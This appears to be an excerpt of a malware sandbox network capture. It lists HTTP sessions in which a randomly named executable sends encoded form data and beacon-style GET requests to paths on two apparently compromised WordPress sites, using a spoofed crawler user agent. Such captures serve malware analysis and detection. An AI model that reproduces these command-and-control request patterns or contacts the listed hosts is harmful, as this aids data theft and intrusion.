May 27, 2024 12:20:14.209728956 CEST	1236	IN	Data Raw: 74 5f 6d 61 72 67 69 6e 5f 74 6f 70 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 36 70 78 7d 68 74 6d 6c 3a 6e 6f 74 28 2e 69 73 5f 61 64 61 70 74 69 76 65 29 20 2e 62 2d 74 65 78 74 5f 73 69 7a 65 5f 6c 61 72 67 65 2d 63 6f 6d 70 61 63 74 5c 40 64 65 Data Ascii: t_margin_top{margin-top:36px}html:not(.is_adaptive) .b-text_size_large-compact\@desktop{font:24px/30px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;margin-bottom:36px}html:not(.is_adaptive) .b-text_size_medium\@desktop{font:20px/30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49724	89.42.218.92	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:38.522320986 CEST	712	OUT	POST /jaeg/ HTTP/1.1 Host: www.mediciconstanta.ro Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.mediciconstanta.ro Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.mediciconstanta.ro/jaeg/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 77 4d 42 48 37 69 6a 6c 35 4d 55 32 38 2b 76 75 66 58 77 47 6a 37 43 61 6d 6f 2b 34 4c 2f 75 74 33 51 55 51 73 35 38 4a 62 39 44 6e 2f 53 57 37 38 32 63 7a 39 6a 4f 59 33 55 5a 67 2b 74 38 6f 34 2f 51 51 48 71 66 67 50 55 69 32 54 59 6f 45 62 2b 36 37 58 77 77 70 48 39 41 53 6c 45 72 72 61 37 6d 69 43 31 63 48 46 78 67 4c 6d 64 79 61 7a 63 47 65 52 61 33 6d 68 72 67 41 4b 52 51 70 53 55 70 6a 6c 6c 6b 74 43 77 6b 62 77 2f 38 49 37 4c 4f 2b 32 6d 75 4e 61 62 50 66 37 46 63 77 4f 35 79 4c 6e 57 74 69 64 43 6d 37 59 38 49 49 56 4b 76 4a 7a 73 70 39 6e 30 55 54 6f 77 65 46 45 51 3d 3d Data Ascii: VlEHDVvh=wMBH7ijl5MU28+vufXwGj7Camo+4L/ut3QUQs58Jb9Dn/SW782cz9jOY3UZg+t8o4/QQHqfgPUi2TYoEb+67XwwpH9ASlErra7miC1cHFxgLmdyazcGeRa3mhrgAKRQpSUpjllktCwkbw/8I7LO+2muNabPf7FcwO5yLnWtidCm7Y8IIVKvJzsp9n0UToweFEQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49725	89.42.218.92	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:41.065351009 CEST	732	OUT	POST /jaeg/ HTTP/1.1 Host: www.mediciconstanta.ro Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.mediciconstanta.ro Cache-Control: no-cache Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Referer: http://www.mediciconstanta.ro/jaeg/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 77 4d 42 48 37 69 6a 6c 35 4d 55 32 75 50 66 75 4d 47 77 47 79 72 44 6f 70 49 2b 34 42 66 75 70 33 51 51 51 73 38 63 2f 62 72 7a 6e 2b 77 2b 37 75 6e 63 7a 2b 6a 4f 59 76 6b 5a 6c 36 74 38 33 34 2f 63 2b 48 76 66 67 50 51 4b 32 54 61 67 45 62 74 53 30 57 67 77 38 65 4e 41 51 76 6b 72 72 61 37 6d 69 43 32 67 70 46 78 34 4c 6e 73 43 61 7a 2b 2b 64 5a 36 33 6c 6d 72 67 41 4f 52 51 74 53 55 70 64 6c 6e 42 32 43 79 73 62 77 2f 4d 49 37 61 4f 78 2f 6d 75 50 45 72 50 50 39 67 74 45 4a 4b 61 4e 76 51 39 42 53 52 2b 33 55 61 5a 53 4b 34 6e 66 6d 76 39 77 71 6a 74 6a 6c 7a 6a 4d 66 51 56 42 6b 53 59 49 53 78 73 72 6f 6a 33 6f 66 63 33 77 54 74 77 3d Data Ascii: VlEHDVvh=wMBH7ijl5MU2uPfuMGwGyrDopI+4Bfup3QQQs8c/brzn+w+7uncz+jOYvkZl6t834/c+HvfgPQK2TagEbtS0Wgw8eNAQvkrra7miC2gpFx4LnsCaz++dZ63lmrgAORQtSUpdlnB2Cysbw/MI7aOx/muPErPP9gtEJKaNvQ9BSR+3UaZSK4nfmv9wqjtjlzjMfQVBkSYISxsroj3ofc3wTtw=
May 27, 2024 12:20:42.580352068 CEST	1236	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://mediciconstanta.ro/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: br vary: Accept-Encoding date: Mon, 27 May 2024 10:20:41 GMT server: LiteSpeed x-xss-protection: 1; mode=block x-content-type-options: nosniff Data Raw: 32 66 36 39 0d 0a d4 26 10 a2 28 67 b5 3f 5c 11 a9 49 3d 00 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be 2f 33 ad 7a db 11 fd f8 c3 70 94 4d 76 01 20 09 8a a4 44 b7 5c 7d 9e e5 aa d9 a3 5c a1 00 81 24 05 99 04 d0 00 a8 a3 d5 7a f5 e7 b9 bf ef e9 bf 69 ea 7f 4d 01 2a fa 13 66 91 f4 ad 21 29 45 4e f2 65 92 59 b6 c5 30 fc 46 e2 25 39 c9 2c c4 2c a2 95 c8 95 fb df 07 e9 3e fa d7 34 71 e1 ff 7f 6f 5a f1 c9 01 b0 81 c3 87 da 9e 90 37 b2 45 09 a6 80 ee 7d f7 81 5f 01 94 ab 26 54 a9 04 4a 96 80 64 19 94 2c 81 e4 7b ef 7b 3f d4 2f c9 2e c9 dd bb 72 96 3b 4a 9a 24 b9 93 ec ee ec 34 61 43 0e 80 da 3d 9e 1c d1 1e be 04 94 ec 4d aa bf 09 76 80 cb 16 f5 59 94 00 20 fb 38 f4 bf 49 d2 11 76 d8 6c 88 b3 db fc db 17 0f 10 a3 11 aa 66 63 fe c7 af ed 9e 42 9a 01 db 4c 58 b9 97 b8 ea 55 b2 12 42 29 12 bf 39 e8 3e 0e 7b fe bc fe 31 a1 11 43 6a cb f3 a9 04 88 f3 2b e8 8f d3 38 7d d5 89 6b 0c 86 be 7f 8a f9 51 1a 4b 77 01 19 4b c3 7e c0 8f ec fd 5a de 50 8a de c2 9f b3 f6 a0 d0 04 51 a0 28 86 80 28 7d fc 64 2c c7 9f 4e 6e 85 0f [TRUNCATED] Data Ascii: 2f69&(g?\I=)/&>y/3zpMv D\}\$ziMf!)ENeY0F%9,,>4qoZ7E}_&TJd,{{?/.r;J$4aC=MvY 8IvlfcBLXUB)9>{1Cj+8}kQKwK~ZPQ((}d,Nnx=]qFL Ya]^-u\?F_,x'L(-_lvd<,g;oep4{=^S9#&RA!"B&B{t!1A(6yz\LH?{kbtTz(\|\5CL,! {{4WAMRg9Hd]:=!o~CCXD{Y(*Z&`rB/6C>^~ c#Np_QJu(Jhl?aEl-4~G!b!\Qk0qr3<c-6Ma?3
May 27, 2024 12:20:42.580368042 CEST	224	IN	Data Raw: fe 3c 9e 1c e0 16 ff 1b 74 4f 3a 02 26 f8 73 ad e2 ba 8a f3 c2 ed 1e 85 77 00 26 78 f6 23 7c 15 13 9c f1 f6 6d 86 07 08 56 f0 f4 07 a8 ad c1 2d 7e fa ef 7f cc 7f ff 13 45 04 81 a2 40 13 78 1d ff fb 1f 24 41 a3 49 68 d4 cd 46 23 ff d2 81 14 b2 b5 Data Ascii: <tO:&sw&x#\|mV-~E@x$AIhF#&>r}sFW <YU/UKXq%sIQ.:\|!I4!k' Rc&^xE~M?mB\|!j[\qB6_>M%[.
May 27, 2024 12:20:42.580380917 CEST	1236	IN	Data Raw: 07 3c a2 ec 21 98 e0 1a d7 23 0d 7f 24 2c b5 ba 31 f5 6b 61 34 8c 9b 9f 36 16 31 8c 09 d6 13 91 8c 7d 1f f4 1f 26 31 c0 6f dd 0e 64 c4 19 89 fa 0e 12 9a 73 a6 c6 be 55 ac 91 9f ed 60 a9 25 c3 67 99 60 9f f5 4f e7 3d 62 a8 53 ce c0 6d 51 56 25 c1 Data Ascii: <!#$,1ka461}&1odsU`%g`O=bSmQV%%b"XQYY<\O`s^b/n?cgYE!=+V'ADwmVA=ZT[ ^P>G {aB#_iE8-tusaNkBz
May 27, 2024 12:20:42.580394030 CEST	1236	IN	Data Raw: 8f c9 cf a0 ee ce eb 3a 5f 2c f3 fc ee 0e 7d 0b 73 6c c5 54 5f 44 08 77 50 54 2e 0e cf e3 78 49 08 be 3d 6f 4c 7a d6 7d 62 49 07 bd bb b3 32 cd 58 3c 00 a7 bd 7f fb f3 dd dd fb b7 3f 6b 20 36 dd 20 c0 69 b8 cb be 1c 6d 97 b2 fc a7 c6 ce 86 f8 0b Data Ascii: :_,}slT_DwPT.xI=oLz}bI2X<?k 6 im H9$}'^R2u6&8}R/G%#9G8V{vI~~l->w%`:{U"5Gbb6LB~FDHR^?LOKJ`ZVD H
May 27, 2024 12:20:42.580473900 CEST	1236	IN	Data Raw: b8 2f 70 52 54 39 e1 8b 3c 45 f0 30 6d 3b 16 31 1f b9 bd e2 82 f0 bc 22 45 5d 5d 90 57 0b b2 a8 c8 a2 4a 51 25 c0 9d 27 6f 48 4e 6a 9e 65 6e ae 9a c3 8b 37 bf 5d 49 8a 82 6f b4 5a 91 65 41 8a 15 e7 7e 6f d5 15 59 2e 09 cf 97 1e 07 7d 79 2c 56 82 Data Ascii: /pRT9<E0m;1"E]]WJQ%'oHNjen7]IoZeA~oY.}y,VF?K%WQ`~U)Ipox-Erj:JEIi`HL %)3EMxh2][TWJSx~&^pZLE)[oO.ygy]-~D
May 27, 2024 12:20:42.580485106 CEST	1236	IN	Data Raw: 39 2b 1f d9 ed 9e 1e a3 30 fc 98 4c 0d 24 93 38 2e e3 e7 3e d6 a2 a6 5e ba 63 1a 11 68 f7 f9 4f 75 f4 56 a8 28 48 04 7b 65 1e 16 c6 64 55 5a ae 26 59 60 35 a3 de fa 09 b1 69 c3 1e 6f 0f 88 2d 71 a0 f3 8c 96 d5 84 3f df 02 23 3c a0 49 17 53 30 b7 Data Ascii: 9+0L$8.>^chOuV(H{edUZ&Y`5io-q?#<IS0V*kKBzZ66\|NB,7C8Z09CLc1>$58Cji>pY4[//)woMf o!/8FRCW}"SM~sG,b
May 27, 2024 12:20:42.580522060 CEST	1236	IN	Data Raw: b5 58 bc 46 8b d7 22 7f 8d f2 d7 62 b9 6d 59 08 d1 7a df 82 a7 fd 18 d8 27 34 1b 50 97 54 56 8b 3a c7 8f d7 cc 45 0a 94 b0 72 be 3e ff a4 03 6f 38 fc e5 fa ba 00 eb 50 21 a0 c0 af 92 ed 55 d8 cf 2d 1c 3f e1 d0 b5 96 f1 2c 5f 64 a4 91 dc a9 d1 82 Data Ascii: XF"bmYz'4PTV:Er>o8P!U-?,_dJA8CVMA([&GE0@hkblJ8XF^{p{]-.yDF=uKw<_,Uo;!_h4ZXNT '!#(s,=`r\bHE
May 27, 2024 12:20:42.580533028 CEST	1236	IN	Data Raw: 8d 3f 1c 84 24 19 98 8e b6 4c 1d 8b db 44 72 82 6b d7 32 d2 e5 40 36 8a 22 9b 28 50 6d b1 24 a0 f1 d1 15 7e 6a fb d4 f6 d5 6e 5f 85 76 bb f6 e9 ed f6 2d 68 6d 94 07 50 72 0b 48 5c 07 69 9d 12 ab 0f ad cd f6 89 22 71 82 02 d9 a4 a4 d3 4c 54 ff 69 Data Ascii: ?$LDrk2@6"(Pm$~jn_v-hmPrH\i"qLTi,{1UxGh$WQj-(o%GdIk@<ojwNZnc%]&HQjU<'G{bErF*6R2$y(t
May 27, 2024 12:20:42.580545902 CEST	1236	IN	Data Raw: e5 bc 56 c4 97 6b 15 bd 36 4b e0 55 15 9c b8 36 da 5b 23 2b 1f 1f 50 6c 38 2a 54 05 19 91 40 48 16 d5 22 fe b0 e9 20 01 3f 0a 64 4d a9 37 dc 03 2b 6e 9d 46 73 6d 66 1c a4 a2 8b 52 cd 19 25 d9 e6 6c 99 65 16 5d 7a b0 9d 64 57 58 15 5b 65 db 48 a8 Data Ascii: Vk6KU6[#+Pl8T@H" ?dM7+nFsmfR%le]zdWX[eH>OAj4hXjM D4ihpV:lU7i\|wvvxS"'2xQb"IAIin?REBj\Qe\M)xE;:\|F<a0(M
May 27, 2024 12:20:42.580559969 CEST	1000	IN	Data Raw: c5 26 72 77 7e 86 8e 8c ac ba e0 14 7f ff d5 68 6c e8 82 34 f4 66 de df 7f 6d 8e d9 33 05 57 58 ab fd 0b 60 7d 7e 06 72 9e b0 ba 87 a5 20 23 3d cb e6 fc 0c a6 26 2b 94 f5 32 2b 54 90 3e 59 dc fd 5f dc c5 1f 21 50 91 e7 52 70 4f 53 ac 03 3a 73 21 Data Ascii: &rw~hl4fm3WX`}~r #=&+2+T>Y_!PRpOS:s!-`@E~i\|}Gu;h.~.!p\4 3LajB-.py~"EmRs}NLI_5?g8]f?%E~k`"-dN)qU-qP-d
May 27, 2024 12:20:42.585464001 CEST	1236	IN	Data Raw: ca 1b 69 18 95 38 7b 81 d1 da a8 4e 48 aa 46 07 13 9e 58 c2 ba b9 4a 24 b6 fa 01 a1 f8 76 45 6f 2c d5 e2 e4 a3 95 8f 46 f8 81 ed 94 c3 40 23 f2 0f 16 a1 80 d5 a3 93 13 6f 85 1a 4f 06 90 3c 42 98 a9 97 8a 02 a3 11 ae 5d f3 c3 ec 3d 6d 6a bd ef 46 Data Ascii: i8{NHFXJ$vEo,F@#oO<B]=mjF\tqKk#7eN'+64QNVG@\|G9=<m?~dV24pk$vY}#!2@"5?Bxly:~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.12	49726	89.42.218.92	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:43.616141081 CEST	1745	OUT	POST /jaeg/ HTTP/1.1 Host: www.mediciconstanta.ro Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.mediciconstanta.ro Cache-Control: no-cache Connection: close Content-Length: 1237 Content-Type: application/x-www-form-urlencoded Referer: http://www.mediciconstanta.ro/jaeg/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 77 4d 42 48 37 69 6a 6c 35 4d 55 32 75 50 66 75 4d 47 77 47 79 72 44 6f 70 49 2b 34 42 66 75 70 33 51 51 51 73 38 63 2f 62 6f 54 6e 2b 44 47 37 38 55 6b 7a 2f 6a 4f 59 69 45 5a 6b 36 74 38 36 34 2f 55 36 48 76 6a 57 50 57 4f 32 53 2f 30 45 4d 4d 53 30 63 67 77 38 44 39 41 54 6c 45 71 70 61 37 32 6d 43 32 77 70 46 78 34 4c 6e 75 61 61 31 73 47 64 62 36 33 6d 68 72 67 4d 4b 52 51 46 53 55 78 4e 6c 6e 55 44 58 53 4d 62 77 66 63 49 34 6f 6d 78 2b 47 75 4a 46 72 4f 51 39 67 70 62 4a 4c 32 77 76 51 68 37 53 51 4b 33 46 64 6b 50 54 35 58 34 78 4a 5a 43 36 7a 64 6e 38 51 33 50 45 41 78 6f 68 68 46 79 5a 78 6b 69 72 51 61 6d 48 59 4c 47 50 49 6a 36 62 68 6d 57 66 78 43 61 70 39 77 73 49 4c 37 35 44 32 61 4d 4f 4e 4a 33 31 48 63 4b 6e 31 47 49 46 46 34 67 72 5a 75 78 6e 30 5a 6d 74 32 72 50 66 42 4c 4e 73 30 46 4f 66 73 61 49 76 6f 75 37 48 45 31 51 68 66 76 6f 49 67 6f 65 78 72 67 67 54 50 6f 4f 4d 4b 76 66 41 56 66 46 2b 33 50 63 45 34 6a 32 34 4e 45 69 49 54 47 39 55 64 39 47 48 [TRUNCATED] Data Ascii: VlEHDVvh=wMBH7ijl5MU2uPfuMGwGyrDopI+4Bfup3QQQs8c/boTn+DG78Ukz/jOYiEZk6t864/U6HvjWPWO2S/0EMMS0cgw8D9ATlEqpa72mC2wpFx4Lnuaa1sGdb63mhrgMKRQFSUxNlnUDXSMbwfcI4omx+GuJFrOQ9gpbJL2wvQh7SQK3FdkPT5X4xJZC6zdn8Q3PEAxohhFyZxkirQamHYLGPIj6bhmWfxCap9wsIL75D2aMONJ31HcKn1GIFF4grZuxn0Zmt2rPfBLNs0FOfsaIvou7HE1QhfvoIgoexrggTPoOMKvfAVfF+3PcE4j24NEiITG9Ud9GHJmbjob10dzq/+eXsOlVP/+ji8CZSCNXgkprs7K9RpjOy0AXG5wXgtNc0JoWkRuXFMfII9H5Wx4nAMzQx5t7NZgGjm5jwNgSM7lMqxkRDqI0e4awlK+KIYv+3PMWthovQjGp0RBRHDeMasxmE21Zd2u/dwj6Vl/WGFZpqTXebBMAuVjD6EiPGwjy839rx/yQOs0t9zcHkZpMaPUoOsT5RUQbFaTLKnCTA9cAfW2PUd+a2MZP7I2bwK54ULola47axml0P+uXa3/q5z7XvY767ORq8l2LU7JejwVezqksD/ZjedtgJn9yR5vqHIVbX8H6DqUjH//fr3bmdLmJePYnyX/ilJZM52+UxxLAWFnUOFN23tpPj5FI27CmuVsozdYnqJa2B8wR1V8E0U9M+Uu6cWE8AJrPYUiEXWEknra4Pkh7uGhdkAFO14vIfksx+8HZjXVDs+C2zsRqTAnmyQYuP40injzZfZWHlhBh7hMpIT/YLdka+H8ItamckvAgEWpwf5iRomTjgZnfTNTSaAZSNfCp0KfO3U0/PJzuyJPwcU03StWbpSiG3w6Sx/n708HATfdbYi6+VL27wbF3e+Aojdi9nVFteS0uwnY4E7Ewi+eocxd42Q8ohOfgGzNbYaYCtPucw8F4C/liRzXoDNm465IhwPNRcORem/z [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.12	49727	89.42.218.92	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:46.392246008 CEST	430	OUT	GET /jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt HTTP/1.1 Host: www.mediciconstanta.ro Accept: / Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
May 27, 2024 12:20:47.831279993 CEST	536	IN	HTTP/1.1 301 Moved Permanently Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://mediciconstanta.ro/jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt content-length: 0 date: Mon, 27 May 2024 10:20:47 GMT server: LiteSpeed x-xss-protection: 1; mode=block x-content-type-options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.12	49728	50.116.86.54	80	3192	C:\Program Files (x86)\lhlKfbBrCNJtLacqlySgiUreWsByYCTRhIHrJeYqohmCdFGofInggsKQElh\JBOkmqufMEGwlAXNwkIjNoQeH.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:01.437177896 CEST	706	OUT	POST /y8lu/ HTTP/1.1 Host: www.celluslim.com.br Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Origin: http://www.celluslim.com.br Cache-Control: no-cache Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Referer: http://www.celluslim.com.br/y8lu/ User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Data Raw: 56 6c 45 48 44 56 76 68 3d 72 55 4e 70 73 57 66 67 79 59 78 77 73 52 48 38 44 7a 74 4a 51 55 47 62 53 62 7a 43 53 45 59 68 66 7a 32 5a 6f 45 59 79 61 4e 2f 52 49 43 66 39 63 67 48 41 67 2b 6c 75 73 4a 77 33 2b 4d 6c 65 77 78 49 54 52 4e 76 78 69 4c 4d 33 70 45 6a 46 43 58 6e 49 79 4a 35 76 43 39 2b 68 37 71 6b 54 39 56 51 52 68 32 33 6b 73 2b 69 31 4f 31 6f 45 57 44 4b 77 78 77 6d 72 44 44 53 77 7a 6e 6c 66 62 46 58 30 39 4e 36 61 4b 50 38 43 51 76 46 64 6b 2b 6f 6c 74 72 32 63 42 33 4f 30 45 2b 6d 70 6f 38 4f 4f 48 32 4c 58 67 42 45 2b 36 6f 5a 6e 52 6b 42 6e 58 5a 42 57 50 46 2b 6c 61 58 47 6f 33 77 3d 3d Data Ascii: VlEHDVvh=rUNpsWfgyYxwsRH8DztJQUGbSbzCSEYhfz2ZoEYyaN/RICf9cgHAg+lusJw3+MlewxITRNvxiLM3pEjFCXnIyJ5vC9+h7qkT9VQRh23ks+i1O1oEWDKwxwmrDDSwznlfbFX09N6aKP8CQvFdk+oltr2cB3O0E+mpo8OOH2LXgBE+6oZnRkBnXZBWPF+laXGo3w==
May 27, 2024 12:21:02.040870905 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 27 May 2024 10:21:01 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://celluslim.com.br/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 14746 Content-Type: text/html; charset=UTF-8 Data Raw: 1f 8b 08 00 00 00 00 00 00 03 dd b2 ed 76 e3 46 92 2d fa bb f4 14 69 7a d9 22 6d 26 09 7e e9 03 14 d5 ed 2e db d3 3e a7 7b ec d5 e5 9e b9 e7 da 5e b5 12 40 00 c8 52 22 13 93 99 20 c5 62 eb 61 66 9d b7 b8 7f fb c5 6e 24 c0 2f 91 a0 48 a9 34 d3 33 a3 0f 00 19 19 b1 63 c7 8e 7d f3 d9 b7 3f be fd f9 ff fc f4 1d 49 6d 26 6e cf 6e dc 8b 08 26 93 49 23 b7 f4 a7 9f 1b 2e 06 2c ba 3d 7b 73 93 81 65 24 4c 99 36 60 27 8d bf fe fc 3d bd 6a 90 ee fa 46 b2 0c 26 8d 29 87 59 ae b4 6d 90 50 49 0b 12 33 67 3c b2 e9 24 82 29 0f 81 96 87 36 e1 92 5b ce 04 35 21 13 30 e9 95 38 5b 30 e7 5a 05 ca 9a f3 35 c8 79 c6 ee 29 cf 58 02 34 d7 e0 9a f8 82 e9 04 ce cb 42 cb ad 80 db 9f fe fe ef 09 97 88 f0 f7 ff ab 08 48 57 aa 59 c4 c8 97 9f 5f f5 7b bd 31 79 0b 42 14 e4 9d e0 d9 4d b7 aa 38 bb 11 5c de 11 0d 62 72 1e 49 e3 a0 63 b0 61 7a 4e 52 fc 9a 9c 77 bb a1 ab 31 58 d2 09 55 d6 09 74 d5 6f 5d d5 60 c2 82 96 cc 42 83 d8 79 8e f3 b3 3c 17 3c 64 96 2b d9 d5 c6 7c 7d 9f 09 bc 72 dd 26 8d 0d 01 f2 a5 66 ff 56 a8 31 f9 1e 20 6a 54 [TRUNCATED] Data Ascii: vF-iz"m&~.>{^@R" bafn$/H43c}?Im&nn&I#.,={se$L6`'=jF&)YmPI3g<$)6[5!08[0Z5y)X4BHWY_{1yBM8\brIcazNRw1XUto]`By<<d+\|}r&fV1 jT{vcL6:PkQ&rf5H:g9dr2!FUktf_ZnYk7xen{\&x0exXXY:hoPl_jkwS.CQDS2q`~7=:gs& Ac\|=,.dmZL&m0^Iyyg'Sg0</~S\|~cU?M_~7yZ(Fvy{8jqTmk{m<39etsL'ma?.+vFk6oB'ANn0'p%ki5BKb;&7{EZ%L&Xlf!:4eiZDWq<-]VQZwF1
May 27, 2024 12:21:02.040889025 CEST	1236	IN	Data Raw: 1e 34 76 af 2a 90 ad 84 d6 97 5f 7e b6 cb 6c 88 cf 60 e8 e1 33 bc b8 dc fa ee 6f 7d 8f b6 be a1 3e ff 72 67 92 e1 ba fd 56 f2 4e a4 bf 17 19 ed 45 e0 38 0e b6 6e 8d cb 15 40 a6 3e f0 d5 0e b6 26 8d 5c 5a ff 62 ad 7e d0 0b 1a 35 57 c1 f2 aa f5 b0 Data Ascii: 4v_~l`3o}>rgVNE8n@>&\Zb~5WDm>eI\Blb9wIw/pi,amcj4jsykaf;HlTNnli/Qq!,^/gC&Mqy@4m~<2@x
May 27, 2024 12:21:02.040901899 CEST	1236	IN	Data Raw: 76 0f 1a 71 0d a1 83 3a 88 bd ce d8 e0 97 95 33 cd f2 83 45 ee b2 ed 1e ad f1 87 c2 58 1e cf 91 09 1a 43 da 83 25 cb bc 75 97 87 23 0a 6d 21 38 71 16 87 86 de 5e 0f ea 7f 47 34 88 c9 79 19 31 29 80 3d 7f bc ae 2d 58 b7 28 92 6a 88 27 e7 a9 b5 b9 Data Ascii: vq:3EXC%u#m!8q^G4y1)=-X(j' Da::aBQD`enBnzru$9tmgM:)3t3j;E{^d,r9~AF%,/mGr&3T3\4Ww8!TZ}y@Z8+y)
May 27, 2024 12:21:02.040930033 CEST	1236	IN	Data Raw: 4b aa 26 d5 5c de 6d e8 ad c9 3e 29 ea cb 3a fe c2 34 67 14 ee 73 26 23 88 26 56 17 f0 db 62 d3 09 fd 16 36 5d 3b 42 d1 22 e8 91 d6 27 f7 dd b1 d4 46 73 6f 23 e7 d8 e2 5e 0d 77 4a d3 5c 2b cc b3 73 bf cc 7a 85 f6 ce 56 a5 ce 01 33 dc 94 62 6e f7 Data Ascii: K&\m>):4gs&#&Vb6];B"'Fso#^wJ\+szV3bn;n; "(~u)X_Pe@YV$WCxKQEIlfyPJ%xD>_K!0Wpd=T`/+"*,BV
May 27, 2024 12:21:02.040941000 CEST	1236	IN	Data Raw: 97 cc f3 a2 f8 d0 7d d5 a7 d7 ef b7 bd 76 bf 3f 58 a6 b9 7d 2e 93 97 28 d7 97 c3 cb 38 7e f8 7d 06 11 67 a4 e9 88 68 30 4a 14 96 2b e9 f7 ae fb 51 ce 5b 8b bd 15 d5 90 ed 75 46 f9 fd c3 43 07 73 40 e0 e4 d2 d2 a0 b0 56 c9 45 58 68 83 bd 72 c5 a5 Data Ascii: }v?X}.(8~}gh0J+Q[uFCs@VEXhrFsl"(JgLuIi?D}4Ih9Z,I-M4isCp:`sOO(OysSXyD'k[}%0j#Hzv@/?/
May 27, 2024 12:21:02.040952921 CEST	1236	IN	Data Raw: 01 c3 54 49 65 d3 b0 cf ae af 0f 88 b1 4c 73 2d a3 ab 8b de e0 c0 32 96 69 43 4c 0b 7a e1 88 3d c9 8c 8e 5c da 28 88 82 5d b4 44 b3 88 bb 8c dd ed 52 ab 76 56 28 b8 04 a6 d7 15 cd de 60 14 41 d2 d6 49 c0 9a 17 ed de f0 b2 dd ef 5f b6 7b 2d e2 7d Data Ascii: TIeLs-2iCLz=\(]DRvV(`AI_{-}hap"=u7\|cvjE*%N\i&#2G}0j{\pyT-7jhj]w\|6wmWn&-cO.?j/7FAXP)z!lx9
May 27, 2024 12:21:02.040963888 CEST	1236	IN	Data Raw: 55 fd 3a 62 3c 39 92 b7 c3 f1 14 5d 96 0c aa 76 fb b9 ad ea 82 1b 2a d8 5c 15 96 c6 02 ee f7 82 89 e6 51 49 6e 89 f6 4b 28 98 31 5f 4d 1a 6b fe 8d df aa 9a 75 df 0a 63 9d f8 fe 7d e3 b7 56 3b 6f a7 bd 76 da 6f a7 83 76 3a 6c a7 a3 76 7a d1 2e 44 Data Ascii: U:b<9]v\QInK(1_Mkuc}V;ovov:lvz.D[mY'JPnj]BB1t=Q_&m'AZ0sHnvXa.*ZFN~YRn,X#dTIv6)6Gp+.U9^>t\|3a6W
